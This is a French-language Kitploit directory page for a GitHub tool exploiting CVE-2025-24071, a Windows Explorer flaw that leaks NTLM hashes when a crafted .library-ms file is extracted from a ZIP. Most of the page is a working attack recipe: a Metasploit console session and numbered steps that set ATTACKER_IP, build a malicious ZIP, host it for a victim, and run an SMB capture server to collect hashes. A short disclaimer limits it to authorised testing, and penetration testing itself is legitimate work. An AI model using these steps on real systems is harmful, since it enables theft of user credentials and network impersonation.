Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Blackash-CVE-2025-24071 — CVE-2025-24071 | Kitploit
Outils/GitHubGitHub/zbs54/blackash-cve-2025-24071
Exploit FrameworksPayload GenerationVulnerability AnalysisExploitationInformation GatheringPenetration Testing
GitHubzbs54/blackash-cve-2025-24071

Blackash-CVE-2025-24071

CVE-2025-24071

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Blackash-CVE-2025-24071

CVE-2025-24071 : Fuite de hash NTLM via un fichier .library-ms, module Metasploit 🚨

Description

L'exposition d'informations sensibles à un acteur non autorisé dans l'Explorateur Windows permet à un attaquant non autorisé d'effectuer une usurpation d'identité sur un réseau.

Métriques

CNA : Microsoft Corporation, Score de base : 6.5 MOYEN 🟠 Vecteur : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Aperçu

La vulnérabilité se produit lorsqu'un utilisateur extrait une archive ZIP contenant un fichier .library-ms spécialement conçu. L'Explorateur Windows initie automatiquement une requête d'authentification SMB vers un serveur distant spécifié dans le fichier, divulguant le hash NTLM de l'utilisateur sans aucune interaction de sa part.

Ce module Metasploit :

  1. Génère un fichier .library-ms malveillant.
  2. Le compresse dans une archive ZIP.
  3. S'intègre avec la fonctionnalité de capture SMB de Metasploit pour collecter les hash NTLM.
root@kitploit:~
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
        https://metasploit.com


       =[ metasploit v6.4.64-dev                          ]
+ -- --=[ 2519 exploits - 1296 auxiliary - 431 post       ]
+ -- --=[ 1616 payloads - 49 encoders - 13 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > use auxiliary/server/ntlm_hash_leak
msf6 auxiliary(server/ntlm_hash_leak) > set ATTACKER_IP 192.168.1.1
ATTACKER_IP => 192.168.1.1
msf6 auxiliary(server/ntlm_hash_leak) > set FILNAME exploit.zip
FILNAME => exploit.zip
msf6 auxiliary(server/ntlm_hash_leak) > set LIBRARY_NAME malicious.library-ms
LIBRARY_NAME => malicious.library-ms
msf6 auxiliary(server/ntlm_hash_leak) > set SHARE_NAME shared
set SHARE_NAME => shared
msf6 auxiliary(server/ntlm_hash_leak) > run
[*] Malicious ZIP file created: exploit.zip
[*] Host the file and wait for the victim to extract it.
[*] Ensure you have an SMB capture server running to collect NTLM hashes.
[*] Auxiliary module execution completed

Installation :

  1. Clonez le dépôt :
root@kitploit:~
git clone https://github.com/B1ack4sh/Blackash-CVE-2025-24071.git
cd CVE-2025-24071

Utilisation :

  1. Chargez le module :
root@kitploit:~
use auxiliary/server/ntlm_hash_leak
  1. Définissez les options requises :
root@kitploit:~
set ATTACKER_IP 192.168.1.162           # Replace with your IP address
set FILENAME exploit.zip                # Name of the malicious ZIP file
set LIBRARY_NAME malicious.library-ms   # Name of the .library-ms file
set SHARE_NAME shared                   # SMB share name
  1. Exécutez le module :
root@kitploit:~
run
  1. Le module générera un fichier ZIP malveillant (exploit.zip). Hébergez ce fichier pour que la victime le télécharge et l'extrait.
  2. Utilisez le module de capture SMB de Metasploit pour collecter les hash NTLM :
root@kitploit:~
use auxiliary/server/capture/smb
set SRVHOST 192.168.1.162  # Same as ATTACKER_IP
run

Avertissement ⚠️

Uniquement à des fins éducatives et de recherche. Utilisez-le uniquement contre des systèmes que vous possédez ou pour lesquels vous avez l'autorisation de tester.

Télécharger l’outil